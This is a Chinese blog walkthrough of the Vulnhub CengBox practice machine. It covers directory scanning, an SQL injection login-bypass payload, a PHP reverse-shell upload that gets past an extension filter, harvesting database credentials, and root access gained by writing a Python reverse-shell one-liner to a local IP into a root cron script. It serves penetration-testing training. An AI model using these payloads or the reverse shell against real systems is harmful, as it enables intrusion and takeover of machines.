1. Toy模板网首页
  2. > Toy博客

Vulnhub_CengBox

10月前 作者:Revenge_scan 分类:Toy博客 阅读(20) 违法举报

这篇具有很好参考价值的文章主要介绍了Vulnhub_CengBox。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一 环境异常处理

(一)nat设置无法正常获取地址

1 单用户模式进入命令行

2 passwd更改

3 修改网络配置文件

二 环境测试

(一)信息收集

1 端口服务

2 目录扫描

(二)漏洞测试

1 SQL注入万能密码绕过

2 文件上传getshell

(三)提权

1 python脚本提权

三 环境知识点

(一)二级目录发现登录页面

(二)SQL注入万能密码绕过登录

(三)python脚本反弹shell

一 环境异常处理

(一)nat设置无法正常获取地址

1 单用户模式进入命令行

启动时按键e进入配置,将ro更改为rw single init=/bin/bash,更改完成ctrl+x保存重启进入命令行

Vulnhub_CengBox

Vulnhub_CengBox

 

2 passwd更改

为方便配置管理环境,更改环境口令,#passwd可修改口令

3 修改网络配置文件

#vi /etc/network/interfaces修改网络配置,将enp0s3更改为ens33保存重启即可

Vulnhub_CengBox

 

二 环境测试

(一)信息收集

1 端口服务

1.1环境地址发现

1.2全端口快速扫描

1.3存活端口详细扫描

Vulnhub_CengBox

 端口服务探测开放22和80端口

2 目录扫描

2.1 目录爆破

对80端口进行目录爆破,这里需要使用大字典

#dirb http://192.168.4.47 /usr/share/wordlists/dirb/big.txt

Vulnhub_CengBox

 发现masteradmin目录uploads等,其中uploads无权限访问。

Vulnhub_CengBox

 

2.2 子目录爆破

对masteradmin子目录进行扫描探测,重点查找php结尾目录

#dirb http://192.168.4.47/masteradmin/ -X .php,.html

Vulnhub_CengBox

 发现login.php

漏洞测试

1 SQL注入万能密码绕过

访问masteradmin/login.php是一个登录页面,使用万能密码成功登录

Vulnhub_CengBox

 登录成功是一个文件上传界面。

2 文件上传getshell

使用kali自带的php_reverse_shell,上传发现后缀有ceng限制。

Vulnhub_CengBox

Vulnhub_CengBox

 尝试上传.php.ceng文件成功,并解析成功,反弹shell

Vulnhub_CengBox

Vulnhub_CengBox

Vulnhub_CengBox

 

提权

1 python脚本提权

1.1 信息收集

Getshell之后进行信息收集,尝试suid/cron等等提权无果,cengover具有bash,初步思路想办法先su到cengover用户。

Vulnhub_CengBox

 

1.2 mysql登录凭证发现

之前目录扫描发现db.php,在/var/www/html/admin下拿到源码并拿到mysql登录凭证

Vulnhub_CengBox

 

1.3 cengover用户登录凭证发现

登录mysql,收集到cengover用户凭证

Vulnhub_CengBox

Vulnhub_CengBox

 

1.4 pspy to find hidden cronjobs and processes

切换到cengover用户尝试使用常规sudo,suid,cap等等提权均无果,上传pspy监控隐藏进程发现/opt/md5check.py每隔一段时间会以root权限运行,并且cengover可写。

Vulnhub_CengBox

Vulnhub_CengBox

Vulnhub_CengBox

 

1.5 python反弹shell

将python_Reverse Shell 写入脚本,启动监听成功拿到root。

#import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.41",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash") 文章来源地址https://www.toymoban.com/news/detail-435137.html

Vulnhub_CengBox

 

三 环境知识点

Vulnhub_CengBox

 

(一)二级目录发现登录页面

#dirb http://192.168.4.47/masteradmin/ -X .php,.html

(二)SQL注入万能密码绕过登录

11' or '1'='1' #

(三)python脚本反弹shell

#import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.41",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash") 

到了这里,关于Vulnhub_CengBox的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • windows 环境修改 Docker 存储目录

    windows 环境修改存储目录 docker 安装时不提供指定安装路径和数据存储路径的选项,且默认是安装在C盘的。C盘比较小的,等docker运行久了,一大堆的东西放在上面容易导致磁盘爆掉。所以安装前可以做些准备,让安装的实际路径不在C盘,当然安装好的的,也可以卸载了重新来

    2024年02月16日
    浏览(39)
  • Maven环境搭建及Maven部分目录分析

    Maven环境搭建及Maven部分目录分析

    Maven 本身就是⼀套由 Java 开发的软件,所以 Maven 的运⾏需要依赖 JDK 环境。在安装 Maven 之前请 确认JDK 是否配置正确(主要依赖 JAVA_HOME 环境变量)。如果没有正确安装和配置 JDK ,则运⾏ Maven 时 会出现以下错误信息:          The JAVA_HOME environment variable is not defined correct

    2024年01月20日
    浏览(38)

  • docker容器共享宿主机环境(目录挂载)

    一、背景介绍 如果开发的服务均需要将打成docker镜像,可是随着服务越来越多,镜像也越来越多。每次制作镜像的时候都需要将依赖打进容器,这样一个jre的环境就是100多M。有一天突发奇想,容器能不能共用宿主机的环境?这样每次打镜像时体积就会少不少。 二、测试 我们

    2024年02月09日
    浏览(62)
  • Jmeter系列-环境部署、详细介绍、安装目录介绍(1)

    Jmeter系列-环境部署、详细介绍、安装目录介绍(1)

    http://jmeter.apache.org/下载最新版本的 JMeter,解压文件到任意目录 1、下载(注意选择操作系统对应的位数32/64) 官网 :http://www.oracle.com 2、安装(一键式) ,所有步骤选择项默认选择项。 3、配置环境变量 JAVA_HOME=JDK完整安装路径 环境变量Path添加:%JAVA_HOME%bin;%JAVA_HOME%jrebin;

    2024年02月09日
    浏览(44)
  • linux环境下解决“没有那个文件或目录”的问题

    linux环境下解决“没有那个文件或目录”的问题

            在观看朱老师学习大讲堂的安装arm-linux-gcc一部分内容的时候,前面的一些基本操作都跟朱老师的一样,但是在最后下载测试的时候,在真正的应用安装目录下,运行./arm-none-linux-gnueabi-gcc-v,正确的显示应该是一大串字符和最后的4.4.1版本号,但是我在运行的过程中,

    2024年02月11日
    浏览(41)

  • linux环境下统计目录下所有文件的行数

    工作中时常有统计数据行和代码行的需求,虽然能依次打开每个文件数一下,但是这样操作效率太低了,如果是在linux环境中,可以使用一个常用的命令 wc ,一起记录一下常见的用法吧。 wc 命令, (全称water closet,洗手间,哦,错了) ,全称word count?我也没找到,作用就是

    2023年04月19日
    浏览(40)
  • 在指定目录下建立conda虚拟环境后发现没有环境名(激活失败)的解决办法

    在指定目录下建立conda虚拟环境后发现没有环境名(激活失败)的解决办法

    1.背景 一般来说,大家在 使用conda建立虚拟环境 时都是 默认C盘 。具体地,大家可以使用 conda env list 进行查看。如下,可以看到我师兄机上的虚拟环境基本都在C盘。因此,C盘也快爆了。 2.在指定目录下建立conda虚拟环境 具体地,可以使用 conda create --prefix=your_path python=X.X 来

    2023年04月08日
    浏览(39)
  • win10系统切换到macOS,开发环境与软件资源,目录清单

    win10系统切换到macOS,开发环境与软件资源,目录清单

    1、因为考研自习室或学校图书馆,随身携带游戏本(全能本)受限于 不插电源就不续航和掉性能,以及风扇噪音非常大,以及发热很烫 等问题。 2、所以想考虑给主力机换个mac,目前暂定是买啦 m1pro(10+16)+16g+1t 的版本,因为原来的电脑空间用了非常多,不得不删掉一些东西

    2024年02月15日
    浏览(49)
  • Oracle21C:Windows版本的安装、卸载、环境变量配置、避坑指南|ORA-12514|为什么安装目录没有bin目录

    Oracle21C:Windows版本的安装、卸载、环境变量配置、避坑指南|ORA-12514|为什么安装目录没有bin目录

    安装Oracle21C(点击下载),因不得其法,各种报错,导致不能正常使用Oracle。  提示:版本是Oracle21C, 其他版本可能存在差异, 目前官网已更新到Oracle23C (进官网后,向下滚动,可下载其他版本)。  1)Oracle下载地址:官网下载页面 2)navecat下载地址:navecate 3)sqlplus下载地

    2024年01月25日
    浏览(56)

  • anaconda在新的conda环境创建与打开jupyter notebook,在新的文件目录下打开jupyter notebook(有视频教学)

    目录 视频链接如下: anaconda 1.创建新的conda环境; 2.在新的conda环境打开jupyter notebook; 3.在新的文件目录下打开jupyter notebook; 详细步骤: 本文也是根据该视频的教学学习做的笔记,希望帮助到更多人。 https://www.bilibili.com/video/BV1CU4y1v7PV/?spm_id_from=333.788.top_right_bar_window_histor

    2024年02月01日
    浏览(72)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包